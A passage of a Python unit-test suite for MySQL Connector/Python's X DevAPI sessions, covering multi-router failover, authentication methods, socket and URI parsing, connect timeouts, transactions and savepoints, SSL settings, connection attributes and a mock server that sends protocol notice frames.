def send_auth_ok(self):
"""Send authenticate OK.
"""
msg = Message("Mysqlx.Session.AuthenticateOk")
self._writer.write_message(mysqlxpb_enum(
"Mysqlx.ServerMessages.Type.SESS_AUTHENTICATE_OK"), msg)
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 12), "XPlugin not compatible")
class MySQLxSessionTests(tests.MySQLxTests):
def setUp(self):
self.connect_kwargs = tests.get_mysqlx_config()
self.schema_name = self.connect_kwargs["schema"]
try:
self.session = mysqlx.get_session(self.connect_kwargs)
except mysqlx.Error as err:
self.fail("{0}".format(err))
if os.name == "nt":
if "64" in platform.architecture()[0]:
self.platform_arch = "x86_64"
elif "32" in platform.architecture()[0]:
self.platform_arch = "i386"
else:
self.platform_arch = platform.architecture()
self.os_ver = "Windows-{}".format(platform.win32_ver()[1])
else:
self.platform_arch = platform.machine()
if platform.system() == "Darwin":
self.os_ver = "{}-{}".format("macOS", platform.mac_ver()[0])
else:
self.os_ver = "-".join(linux_distribution()[0:2])
license_chunks = LICENSE.split(" ")
if license_chunks[0] == "GPLv2":
self.client_license = "GPL-2.0"
else:
self.client_license = "Commercial"
def test___init__(self):
bad_config = {
"host": "bad_host",
"port": "",
"username": "root",
"password": ""
}
self.assertRaises(InterfaceError, mysqlx.Session, bad_config)
host = self.connect_kwargs["host"]
port = self.connect_kwargs["port"]
user = self.connect_kwargs["user"]
password = self.connect_kwargs["password"]
# Session to a farm using one of many routers (prios)
# Loop during connect because of network error (succeed)
routers = [{"host": "bad_host","priority": 100},
{"host": host, "port": port, "priority": 98}]
uri = build_uri(user=user, password=password, routers=routers)
session = mysqlx.get_session(uri)
session.close()
# Session to a farm using one of many routers (incomplete prios)
routers = [{"host": "bad_host", "priority": 100},
{"host": host, "port": port}]
uri = build_uri(user=user, password=password, routers=routers)
self.assertRaises(ProgrammingError, mysqlx.get_session, uri)
try:
session = mysqlx.get_session(uri)
except ProgrammingError as err:
self.assertEqual(4000, err.errno)
# Session to a farm using invalid priorities (out of range)
routers = [{"host": "bad_host", "priority": 100},
{"host": host, "port": port, "priority": 101}]
uri = build_uri(user=user, password=password, routers=routers)
self.assertRaises(ProgrammingError, mysqlx.get_session, uri)
try:
session = mysqlx.get_session(uri)
except ProgrammingError as err:
self.assertEqual(4007, err.errno)
# Establish a Session to a farm using one of many routers (no prios)
routers = [{"host": "bad_host"}, {"host": host, "port": port}]
uri = build_uri(user=user, password=password, routers=routers)
session = mysqlx.get_session(uri)
session.close()
# Break loop during connect (non-network error)
uri = build_uri(user=user, password="bad_pass", routers=routers)
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Break loop during connect (none left)
uri = "mysqlx://{0}:{1}@[bad_host, another_bad_host]".format(user, password)
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
try:
session = mysqlx.get_session(uri)
except InterfaceError as err:
self.assertEqual(4001, err.errno)
# Invalid option with URI
uri = "mysqlx://{0}:{1}@{2}:{3}?invalid=option" \
"".format(user, password, host, port)
self.assertRaises(ProgrammingError, mysqlx.get_session, uri)
# Invalid option with dict
config = {
"user": user,
"password": password,
"host": host,
"port": port,
"invalid": "option"
}
self.assertRaises(ProgrammingError, mysqlx.get_session, config)
# Invalid option with kwargs
self.assertRaises(ProgrammingError, mysqlx.get_session, **config)
# SocketSteam.is_socket()
session = mysqlx.get_session(user=user, password=password,
host=host, port=port)
self.assertFalse(session._connection.stream.is_socket())
def test_auth(self):
sess = mysqlx.get_session(self.connect_kwargs)
sess.sql("CREATE USER 'native'@'%' IDENTIFIED WITH "
"mysql_native_password BY 'test'").execute()
sess.sql("CREATE USER 'sha256'@'%' IDENTIFIED WITH "
"sha256_password BY 'sha256'").execute()
config = {'host': self.connect_kwargs['host'],
'port': self.connect_kwargs['port']}
config['user'] = 'native'
config['password'] = 'test'
config['auth'] = 'plain'
mysqlx.get_session(config)
config['auth'] = 'mysql41'
mysqlx.get_session(config)
config['user'] = 'sha256'
config['password'] = 'sha256'
if tests.MYSQL_VERSION >= (8, 0, 1):
config['auth'] = 'plain'
mysqlx.get_session(config)
config['auth'] = 'mysql41'
self.assertRaises(InterfaceError, mysqlx.get_session, config)
sess.sql("DROP USER 'native'@'%'").execute()
sess.sql("DROP USER 'sha256'@'%'").execute()
sess.close()
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 5),
"SHA256_MEMORY authentication mechanism not available")
def test_auth_sha256_memory(self):
sess = mysqlx.get_session(self.connect_kwargs)
sess.sql("CREATE USER 'caching'@'%' IDENTIFIED WITH "
"caching_sha2_password BY 'caching'").execute()
config = {
"user": "caching",
"password": "caching",
"host": self.connect_kwargs["host"],
"port": self.connect_kwargs["port"]
}
# Session creation is not possible with SSL disabled
config["ssl-mode"] = mysqlx.SSLMode.DISABLED
self.assertRaises(InterfaceError, mysqlx.get_session, config)
config["auth"] = mysqlx.Auth.SHA256_MEMORY
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Session creation is possible with SSL enabled
config["ssl-mode"] = mysqlx.SSLMode.REQUIRED
config["auth"] = mysqlx.Auth.PLAIN
mysqlx.get_session(config)
# Disable SSL
config["ssl-mode"] = mysqlx.SSLMode.DISABLED
# Password is now in the server-side cache, so session creation is possible
config["auth"] = mysqlx.Auth.SHA256_MEMORY
mysqlx.get_session(config)
sess.sql("DROP USER 'caching'@'%'").execute()
sess.close()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 15), "--mysqlx-socket option"
" tests not available for this MySQL version")
@unittest.skipIf(os.name == 'nt', "sockets not available"
" on windows")
def test_mysqlx_socket(self):
# Connect with unix socket
uri = "mysqlx://{user}:{password}@({socket})".format(
user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
socket=self.connect_kwargs["socket"])
session = mysqlx.get_session(uri)
# No SSL with Unix Sockets
res = mysqlx.statement.SqlStatement(session._connection,
"SHOW STATUS LIKE 'Mysqlx_ssl_active'").execute().fetch_all()
self.assertEqual("OFF", res[0][1])
session.close()
# Socket parsing tests
conn = mysqlx._get_connection_settings("root:@(/path/to/sock)")
self.assertEqual("/path/to/sock", conn["socket"])
self.assertEqual("", conn["schema"])
conn = mysqlx._get_connection_settings("root:@(/path/to/sock)/schema")
self.assertEqual("/path/to/sock", conn["socket"])
self.assertEqual("schema", conn["schema"])
conn = mysqlx._get_connection_settings("root:@/path%2Fto%2Fsock")
self.assertEqual("/path/to/sock", conn["socket"])
self.assertEqual("", conn["schema"])
conn = mysqlx._get_connection_settings("root:@/path%2Fto%2Fsock/schema")
self.assertEqual("/path/to/sock", conn["socket"])
self.assertEqual("schema", conn["schema"])
conn = mysqlx._get_connection_settings("root:@.%2Fpath%2Fto%2Fsock")
self.assertEqual("./path/to/sock", conn["socket"])
self.assertEqual("", conn["schema"])
conn = mysqlx._get_connection_settings("root:@.%2Fpath%2Fto%2Fsock"
"/schema")
self.assertEqual("./path/to/sock", conn["socket"])
self.assertEqual("schema", conn["schema"])
conn = mysqlx._get_connection_settings("root:@..%2Fpath%2Fto%2Fsock")
self.assertEqual("../path/to/sock", conn["socket"])
self.assertEqual("", conn["schema"])
conn = mysqlx._get_connection_settings("root:@..%2Fpath%2Fto%2Fsock"
"/schema")
self.assertEqual("../path/to/sock", conn["socket"])
self.assertEqual("schema", conn["schema"])
@unittest.skipIf(HAVE_MYSQLXPB_CEXT == False, "C Extension not available")
def test_connection_uri(self):
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"],
use_pure=False)
session = mysqlx.get_session(uri)
self.assertIsInstance(session, mysqlx.Session)
# Test URI parser function
for uri, res in _URI_TEST_RESULTS:
try:
settings = mysqlx._get_connection_settings(uri)
self.assertEqual(res, settings)
except mysqlx.Error:
self.assertEqual(res, None)
# Test URI parser function
for uri, res in _ROUTER_LIST_RESULTS:
try:
settings = mysqlx._get_connection_settings(uri)
self.assertEqual(res, settings)
except mysqlx.Error:
self.assertEqual(res, None)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 13),
"MySQL 8.0.13+ is required for connect timeout")
def test_connect_timeout(self):
config = self.connect_kwargs.copy()
# 0 ms disables timeouts on socket connections
config["connect-timeout"] = 0
session = mysqlx.get_session(config)
session.close()
# 10000 ms should be enough time to connect
config["connect-timeout"] = 10000
session = mysqlx.get_session(config)
session.close()
# Use connect timeout in URI
session = mysqlx.get_session(build_uri(**config))
session.close()
# Timeout for an unreachable host
# https://en.wikipedia.org/wiki/IPv4#Special-use_addresses
hosts = [
"198.51.100.255",
"192.0.2.255",
"10.255.255.1",
"192.0.2.0",
"203.0.113.255",
"10.255.255.255",
"192.168.255.255",
"203.0.113.4",
"192.168.0.0",
"172.16.0.0",
"10.255.255.251",
"172.31.255.255",
"198.51.100.23",
"172.16.255.255",
"198.51.100.8",
"192.0.2.254",
]
unreach_hosts = []
config["connect-timeout"] = 2000
# Find two unreachable hosts for testing
for host in hosts:
try:
config["host"] = host
mysqlx.get_session(config)
except mysqlx.TimeoutError:
unreach_hosts.append(host)
if len(unreach_hosts) == 2:
break # We just need 2 unreachable hosts
except:
pass
total_unreach_hosts = len(unreach_hosts)
self.assertEqual(total_unreach_hosts, 2,
"Two unreachable hosts are needed, {0} found"
"".format(total_unreach_hosts))
# Multi-host scenarios
# Connect to a secondary host if the primary fails
routers = [
{"host": unreach_hosts[0], "port": config["port"], "priority": 100},
{"host": "127.0.0.1", "port": config["port"], "priority": 90}
]
uri = build_uri(user=config["user"], password=config["password"],
connect_timeout=2000, routers=routers)
session = mysqlx.get_session(uri)
session.close()
# Fail to connect to all hosts
routers = [
{"host": unreach_hosts[0], "port": config["port"], "priority": 100},
{"host": unreach_hosts[1], "port": config["port"], "priority": 90}
]
uri = build_uri(user=config["user"], password=config["password"],
connect_timeout=2000, routers=routers)
try:
mysqlx.get_session(uri)
self.fail("It should not connect to any unreachable host")
except mysqlx.TimeoutError as err:
self.assertEqual(err.msg,
"All server connection attempts were aborted. "
"Timeout of 2000 ms was exceeded for each "
"selected server")
except mysqlx.InterfaceError as err:
self.assertEqual(err.msg, "Failed to connect to any of the routers")
# Trying to establish a connection with a wrong password should not
# wait for timeout
config["host"] = "127.0.0.1"
config["password"] = "invalid_password"
config["connect-timeout"] = 2000
time_start = time.time()
self.assertRaises(InterfaceError, mysqlx.get_session, config)
time_elapsed = time.time() - time_start
session.close()
if time_elapsed >= config["connect-timeout"] / 1000: # timeout is in ms, elapsed in seconds
self.fail("Trying to establish a connection with a wrong password "
"should not wait for timeout")
# The connection timeout value must be a positive integer
config["connect-timeout"] = -1
self.assertRaises(TypeError, mysqlx.get_session, config)
config["connect-timeout"] = 10.0983
self.assertRaises(TypeError, mysqlx.get_session, config)
config["connect-timeout"] = "abc"
self.assertRaises(TypeError, mysqlx.get_session, config)
def test_get_schemas(self):
schema_name = "test_get_schemas"
self.session.create_schema(schema_name)
schemas = self.session.get_schemas()
self.assertIsInstance(schemas, list)
self.assertTrue(schema_name in schemas)
self.session.drop_schema(schema_name)
def test_get_schema(self):
schema = self.session.get_schema(self.schema_name)
self.assertTrue(schema, mysqlx.Schema)
self.assertEqual(schema.get_name(), self.schema_name)
def test_get_default_schema(self):
schema = self.session.get_default_schema()
self.assertTrue(schema, mysqlx.Schema)
self.assertEqual(schema.get_name(), self.connect_kwargs["schema"])
self.assertTrue(schema.exists_in_database())
# Test None value is returned if no schema name is specified
settings = self.connect_kwargs.copy()
settings.pop("schema")
session = mysqlx.get_session(settings)
schema = session.get_default_schema()
self.assertIsNone(schema,
"None value was expected but got '{}'".format(schema))
session.close()
# Test SQL statements not fully qualified, which must not raise error:
# mysqlx.errors.OperationalError: No database selected
self.session.sql('CREATE DATABASE my_test_schema').execute()
self.session.sql('CREATE TABLE my_test_schema.pets(name VARCHAR(20))'
).execute()
settings = self.connect_kwargs.copy()
settings["schema"] = "my_test_schema"
session = mysqlx.get_session(settings)
schema = session.get_default_schema()
self.assertTrue(schema, mysqlx.Schema)
self.assertEqual(schema.get_name(),
"my_test_schema")
result = session.sql('SHOW TABLES').execute().fetch_all()
self.assertEqual("pets", result[0][0])
self.session.sql('DROP DATABASE my_test_schema').execute()
self.assertFalse(schema.exists_in_database())
self.assertRaises(mysqlx.ProgrammingError, session.get_default_schema)
session.close()
# Test without default schema configured at connect time (passing None)
settings = self.connect_kwargs.copy()
settings["schema"] = None
build_uri(**settings)
session = mysqlx.get_session(settings)
schema = session.get_default_schema()
self.assertIsNone(schema,
"None value was expected but got '{}'".format(schema))
session.close()
# Test not existing default schema at get_session raise error
settings = self.connect_kwargs.copy()
settings["schema"] = "nonexistent"
self.assertRaises(InterfaceError, mysqlx.get_session, settings)
# Test BUG#28942938: 'ACCESS DENIED' error for unauthorized user tries
# to use the default schema if not exists at get_session
self.session.sql("DROP USER IF EXISTS 'def_schema'@'%'").execute()
self.session.sql("CREATE USER 'def_schema'@'%' IDENTIFIED WITH "
"mysql_native_password BY 'test'").execute()
settings = self.connect_kwargs.copy()
settings['user'] = 'def_schema'
settings['password'] = 'test'
settings["schema"] = "nonexistent"
# a) Test with no Granted privileges
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
# Access denied for this user
self.assertEqual(1044, context.exception.errno)
# Grant privilege to one unrelated schema
self.session.sql("GRANT ALL PRIVILEGES ON nonexistent.* TO "
"'def_schema'@'%'").execute()
with self.assertRaises(InterfaceError) as context:
_ = mysqlx.get_session(settings)
# Schema does not exist
self.assertNotEqual(1044, context.exception.errno)
def test_drop_schema(self):
test_schema = 'mysql_session_test_drop_schema'
schema = self.session.create_schema(test_schema)
self.session.drop_schema(test_schema)
self.assertFalse(schema.exists_in_database())
def test_create_schema(self):
schema = self.session.create_schema(self.schema_name)
self.assertTrue(schema.exists_in_database())
def test_sql(self):
statement = self.session.sql("SELECT VERSION()")
self.assertTrue(isinstance(statement, mysqlx.Statement))
# SQL statements should be strings
statement = self.session.sql(123)
self.assertRaises(mysqlx.ProgrammingError, statement.execute)
# Test unicode statements
statement = self.session.sql(u"SELECT VERSION()").execute()
self.assertTrue(isinstance(statement, mysqlx.SqlResult))
def test_rollback(self):
table_name = "t2"
schema = self.session.get_schema(self.schema_name)
if not schema.exists_in_database():
self.session.create_schema(self.schema_name)
stmt = "CREATE TABLE {0}.{1}(_id INT)"
self.session.sql(stmt.format(self.schema_name, table_name)).execute()
table = schema.get_table(table_name)
self.session.start_transaction()
table.insert("_id").values(1).execute()
self.assertEqual(table.count(), 1)
self.session.rollback()
self.assertEqual(table.count(), 0)
drop_table(schema, table_name)
def test_commit(self):
table_name = "t2"
schema = self.session.get_schema(self.schema_name)
if not schema.exists_in_database():
self.session.create_schema(self.schema_name)
stmt = "CREATE TABLE {0}.{1}(_id INT)"
self.session.sql(stmt.format(self.schema_name, table_name)).execute()
table = schema.get_table(table_name)
self.session.start_transaction()
table.insert("_id").values(1).execute()
self.assertEqual(table.count(), 1)
self.session.commit()
self.assertEqual(table.count(), 1)
drop_table(schema, table_name)
def test_savepoint(self):
collection_name = "collection_test"
schema = self.session.get_schema(self.schema_name)
# The savepoint name should be a valid string
self.assertRaises(mysqlx.errors.ProgrammingError,
self.session.set_savepoint, 123)
# The savepoint name should not be an empty string
self.assertRaises(mysqlx.errors.ProgrammingError,
self.session.set_savepoint, "")
# The savepoint name should not be a white space
self.assertRaises(mysqlx.errors.ProgrammingError,
self.session.set_savepoint, " ")
# Invalid rollback savepoint without a started transaction
sp1 = self.session.set_savepoint("sp1")
self.assertRaises(mysqlx.errors.OperationalError,
self.session.rollback_to, sp1)
collection = schema.create_collection(collection_name)
self.session.start_transaction()
collection.add({"_id": "1", "name": "Fred", "age": 21}).execute()
self.assertEqual(1, collection.count())
# Create a savepoint named 'sp2'
sp2 = self.session.set_savepoint("sp2")
self.assertEqual(sp2, "sp2")
collection.add({"_id": "2", "name": "Wilma", "age": 33}).execute()
self.assertEqual(2, collection.count())
# Create a savepoint named 'sp3'
sp3 = self.session.set_savepoint("sp3")
collection.add({"_id": "3", "name": "Betty", "age": 67}).execute()
self.assertEqual(3, collection.count())
# Rollback to 'sp3' savepoint
self.session.rollback_to(sp3)
self.assertEqual(2, collection.count())
# Rollback to 'sp2' savepoint
self.session.rollback_to(sp2)
self.assertEqual(1, collection.count())
# The 'sp3' savepoint should not exist at this point
self.assertRaises(mysqlx.errors.OperationalError,
self.session.rollback_to, sp3)
collection.add({"_id": "4", "name": "Barney", "age": 42}).execute()
self.assertEqual(2, collection.count())
# Create an unnamed savepoint
sp4 = self.session.set_savepoint()
collection.add({"_id": "3", "name": "Wilma", "age": 33}).execute()
self.assertEqual(3, collection.count())
# Release unnamed savepoint
self.session.release_savepoint(sp4)
self.assertEqual(3, collection.count())
# The 'sp4' savepoint should not exist at this point
self.assertRaises(mysqlx.errors.OperationalError,
self.session.rollback_to, sp4)
self.session.commit()
schema.drop_collection(collection_name)
def test_close(self):
session = mysqlx.get_session(self.connect_kwargs)
schema = session.get_schema(self.schema_name)
session.close()
self.assertRaises(mysqlx.OperationalError, schema.exists_in_database)
@unittest.skipIf(sys.version_info < (2, 7, 9), "The support for SSL is "
"not available for Python versions < 2.7.9.")
def test_ssl_connection(self):
config = {}
config.update(self.connect_kwargs)
socket = config.pop("socket")
# Secure by default
session = mysqlx.get_session(config)
res = mysqlx.statement.SqlStatement(session._connection,
"SHOW STATUS LIKE 'Mysqlx_ssl_active'").execute().fetch_all()
self.assertEqual("ON", res[0][1])
res = mysqlx.statement.SqlStatement(session._connection,
"SHOW STATUS LIKE 'Mysqlx_ssl_version'").execute().fetch_all()
self.assertTrue("TLS" in res[0][1])
session.close()
# Error on setting Client key without Client Certificate
config["ssl-key"] = tests.SSL_KEY
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Error on setting CRL without setting CA Certificate
config["ssl-crl"] = "/dummy/path"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
config.pop("ssl-crl")
# Error on setting SSL Mode to disabled with any SSL option
config["ssl-mode"] = "disabled"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Error on setting SSL Mode to verify_* without ssl_ca
config["ssl-mode"] = "verify_ca"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
config["ssl-mode"] = "verify_identity"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Error on SSL Mode set to required with CA set
config["ssl-ca"] = tests.SSL_CA
config["ssl-cert"] = tests.SSL_CERT
config["ssl-mode"] = "required"
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Connection with ssl parameters
config["ssl-mode"] = "verify_identity"
session = mysqlx.get_session(config)
res = mysqlx.statement.SqlStatement(session._connection,
"SHOW STATUS LIKE 'Mysqlx_ssl_active'").execute().fetch_all()
self.assertEqual("ON", res[0][1])
res = mysqlx.statement.SqlStatement(session._connection,
"SHOW STATUS LIKE 'Mysqlx_ssl_version'").execute().fetch_all()
self.assertTrue("TLS" in res[0][1])
session.close()
# Error if ssl-mode=disabled and ssl_* set
extra = [("ssl_mode", "disabled"),
("ssl_ca", "({0})".format(tests.SSL_CA))]
uri = build_uri(**dict(list(self.connect_kwargs.items()) + extra))
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Error if invalid ssl-mode
extra = [("ssl_mode", "invalid")]
uri = build_uri(**dict(list(self.connect_kwargs.items()) + extra))
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Parsing SSL Certificates
extra = [("ssl_mode", "verify_ca"),
("ssl_ca", file_uri(tests.SSL_CA, False)),
("ssl_key", file_uri(tests.SSL_KEY, False)),
("ssl_cert", file_uri(tests.SSL_CERT, False))]
uri = build_uri(**dict(list(self.connect_kwargs.items()) + extra))
session = mysqlx.get_session(uri)
extra = [("ssl_mode", "verify_ca"),
("ssl_ca", file_uri(tests.SSL_CA)),
("ssl_key", file_uri(tests.SSL_KEY)),
("ssl_cert", file_uri(tests.SSL_CERT))]
uri = build_uri(**dict(list(self.connect_kwargs.items()) + extra))
session = mysqlx.get_session(uri)
def test_disabled_x_protocol(self):
session = mysqlx.get_session(self.connect_kwargs)
res = session.sql("SHOW VARIABLES WHERE Variable_name = 'port'") \
.execute().fetch_all()
settings = self.connect_kwargs.copy()
settings["port"] = res[0][1] # Lets use the MySQL classic port
session.close()
self.assertRaises(ProgrammingError, mysqlx.get_session, settings)
@unittest.skipIf(HAVE_MYSQLXPB_CEXT == False, "C Extension not available")
def test_use_pure(self):
settings = self.connect_kwargs.copy()
settings["use-pure"] = False
session = mysqlx.get_session(settings)
self.assertFalse(session.use_pure)
self.assertEqual(Protobuf.mysqlxpb.__name__, "_mysqlxpb")
session.use_pure = True
self.assertTrue(session.use_pure)
self.assertEqual(Protobuf.mysqlxpb.__name__, "_mysqlxpb_pure")
# 'use_pure' should be a bool type
self.assertRaises(ProgrammingError, setattr, session, "use_pure", -1)
session.close()
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 16), "XPlugin not compatible")
def test_connection_attributes(self):
# Validate an error is raised if URL user defined connection attributes
# given in a list are invalid
invalid_conn_attrs = [2, 1.2, "[_='13']", '[_="1"]', '[_=23]', "[_2.3]",
"[_invalid]", "[valid=0,_]", "[valid=0,_nvalid]",
"[_invalid,valid=0]"]
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"])
for invalid_attr in invalid_conn_attrs:
uri_test = "{}?connection_attributes={}".format(uri, invalid_attr)
with self.assertRaises(InterfaceError) as _:
mysqlx.get_session(uri_test)
LOGGER.error("InterfaceError not raised while testing "
"invalid attribute: {}".format(invalid_attr))
# Validate an error is raised if URL user defined connection attributes
# are not a list or a bool type
invalid_conn_attrs = ["[incompleteL", "incompleteL]", "A", "invalid",
"_invalid", "2", "2.3", "{}", "{invalid=0}",
"{[invalid=0]}", "_", 2, 0.2]
for invalid_attr in invalid_conn_attrs:
uri_test = "{}?connection_attributes={}".format(uri, invalid_attr)
with self.assertRaises(InterfaceError) as _:
mysqlx.get_session(uri_test)
LOGGER.error("InterfaceError not raised while testing "
"invalid attribute: {}".format(invalid_attr))
# Validate an error is raised if URL user defined connection attributes
# through a connection URL when a name is duplicated
connection_attributes = {
"foo": "bar",
"repeated": "attribute",
"baz": "zoom",
}
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"],
connection_attributes=connection_attributes)
uri = "{},repeated=duplicate_attribute]".format(uri[0:-1])
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(uri)
LOGGER.error("InterfaceError not raised while testing "
"uri: {}".format(uri))
self.assertTrue("Duplicate key 'repeated' used in "
"connection-attributes" in context.exception.msg)
# Test error is raised for attribute name starting with '_'
connection_attributes = [
{"foo": "bar", "_baz": "zoom"},
{"_baz": "zoom"},
{"foo": "bar", "_baz": "zoom", "puuuuum": "kaplot"}
]
for conn_attr in connection_attributes:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection_attributes"] = conn_attr
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(connect_kwargs)
LOGGER.error("InterfaceError not raised while testing "
"connect_kwargs: {}".format(connect_kwargs))
self.assertTrue("connection-attributes" in
context.exception.msg)
self.assertTrue("cannot start with '_'" in context.exception.msg)
# Test error is raised for attribute name size exceeds 32 characters
connection_attributes = [
{"foo": "bar", "p{}w".format("o"*31): "kaplot"},
{"p{}w".format("o"*31): "kaplot"},
{"baz": "zoom", "p{}w".format("o"*31): "kaplot", "a": "b"}
]
for conn_attr in connection_attributes:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection_attributes"] = conn_attr
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(connect_kwargs)
LOGGER.error("InterfaceError not raised while testing "
"connection_attributes: {}".format(conn_attr))
self.assertTrue("exceeds 32 characters limit size" in
context.exception.msg)
# Test error is raised for attribute value size exceeds 1024 characters
connection_attributes = [
{"foo": "bar", "pum": "kr{}nk".format("u"*1024)},
{"pum": "kr{}nk".format("u"*1024)},
{"baz": "zoom", "pum": "kr{}nk".format("u"*1024), "a": "b"}
]
for conn_attr in connection_attributes:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection-attributes"] = conn_attr
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(connect_kwargs)
LOGGER.error("InterfaceError not raised while testing "
"connection_attributes: {}".format(conn_attr))
self.assertTrue("exceeds 1024 characters limit size" in
context.exception.msg)
# Test valid generic values for the connection-attributes on URI
valid_conn_attrs = ["[]", "False", "True", "false", "true", "[valid]",
"[valid=0]", "[valid,valid2=0]", '["_valid=0]',
"[valid2='0']", "[valid=,valid2=0]", "['_valid=0]",
"[[_valid=0]]"]
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"])
for valid_attr in valid_conn_attrs:
uri_test = "{}?connection_attributes={}".format(uri, valid_attr)
mysqlx.get_session(uri_test)
# Test valid generic values when passing a dict with connection data
valid_conn_attrs = [{}, "False", "True", "false", "true", {"valid": ""},
{"valid": None}, {"valid1": 1}, True, False, 1, 0,
[], ['a1=2', 'a3'], {"valid"}, {"foo", "bar"}]
for conn_attr in valid_conn_attrs:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection_attributes"] = conn_attr
mysqlx.get_session(connect_kwargs)
# Test invalid generic values when passing a dict with connection data
invalid_conn_attrs = [{1:"1"}, {1:2}, {"_invalid":""}, {"_": ""},
123, 123.456, None, {"_invalid"}, ['_a1=2',]]
for conn_attr in invalid_conn_attrs:
connect_kwargs = self.connect_kwargs.copy()
connect_kwargs["connection_attributes"] = conn_attr
with self.assertRaises(InterfaceError) as context:
mysqlx.get_session(connect_kwargs)
LOGGER.error("InterfaceError not raised while testing "
"connection_attributes: {}".format(conn_attr))
# Validate the user defined attributes are created in the server
# Test user defined connection attributes through a connection URL
connection_attributes = {
"foo": "bar",
"baz": "zoom",
"quash": "",
"puuuuum": "kaplot"
}
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"],
connection_attributes=connection_attributes)
# Verify user defined session-connection-attributes are in the server
my_session = mysqlx.get_session(uri)
row = my_session.sql("SHOW VARIABLES LIKE \"pseudo_thread_id\"").\
execute().fetch_all()[0]
get_attrs = ("SELECT ATTR_NAME, ATTR_VALUE FROM "
"performance_schema.session_account_connect_attrs "
"where PROCESSLIST_ID = \"{}\"")
rows = my_session.sql(get_attrs.format(row.get_string('Value'))).\
execute().fetch_all()
expected_attrs = connection_attributes.copy()
expected_attrs.update({
"_pid": str(os.getpid()),
"_platform": self.platform_arch,
"_source_host": socket.gethostname(),
"_client_name": "mysql-connector-python",
"_client_license": self.client_license,
"_client_version": ".".join([str(x) for x in VERSION[0:3]]),
"_os": self.os_ver
})
# Note that for an empty string "" value the server stores a Null value
expected_attrs["quash"] = "None"
for row in rows:
self.assertEqual(expected_attrs[row.get_string('ATTR_NAME')],
row.get_string('ATTR_VALUE'),
"Attribute {} with value {} differs of {}".format(
row.get_string('ATTR_NAME'),
row.get_string('ATTR_VALUE'),
expected_attrs[row.get_string('ATTR_NAME')]))
# Verify connection-attributes can be skipped on the server
# by passing "connection_attributes=false" in the URI
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"],
connection_attributes="false")
my_session = mysqlx.get_session(uri)
row = my_session.sql("SHOW VARIABLES LIKE \"pseudo_thread_id\"").\
execute().fetch_all()[0]
get_attrs = ("SELECT ATTR_NAME, ATTR_VALUE FROM "
"performance_schema.session_account_connect_attrs "
"where PROCESSLIST_ID = \"{}\"")
rows = my_session.sql(get_attrs.format(row.get_string('Value'))).\
execute().fetch_all()
self.assertEqual(len(rows), 0, "connection attributes were created "
"even though it was specified not to do so: {}".format(rows))
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 12), "XPlugin not compatible")
class MySQLxInitialNoticeTests(tests.MySQLxTests):
def setUp(self):
self.connect_kwargs = tests.get_mysqlx_config()
self.settings = {
"user": "root",
"password": "",
"host": "localhost",
"ssl-mode": "disabled",
"use_pure": True
}
def _server_thread(self, host="localhost", port=33061, notice=1):
stream = ServerSocketStream()
stream.start_receive(host, port)
reader_writer = MessageReaderWriter(stream)
protocol = ServerProtocol(reader_writer)
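# X Protocol framing: each message is a 4-byte little-endian length (which
# includes the type byte) followed by a 1-byte message type. The client types
# asserted below are, per Mysqlx.ClientMessages.Type: 4 SESS_AUTHENTICATE_START,
# 5 SESS_AUTHENTICATE_CONTINUE, 12 SQL_STMT_EXECUTE and 7 SESS_CLOSE.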
# Read message header
hdr = stream.read(5)
msg_len, msg_type = struct.unpack("<LB", hdr)
self.assertEqual(msg_type, 4)
# Read payload
_ = stream.read(msg_len - 1)
# Send an initial notice before replying to the handshake
if notice == 1:
# send empty notice
stream.sendall(b"\x01\x00\x00\x00\x0b")
else:
# send notice frame with explicit default
stream.sendall(b"\x03\x00\x00\x00\x0b\x08\x01")
#stream.sendall(b"\x01\x00\x00\x00\x0b")
# send auth start")
protocol.send_auth_continue_server("00000000000000000000")
# Capabilities are not checked for ssl-mode: disabled
# Reading auth_continue from client
hdr = stream.read(5)
msg_len, msg_type = struct.unpack("<LB", hdr)
self.assertEqual(msg_type, 5)
# Read payload
_ = stream.read(msg_len - 1)
# Send auth_ok
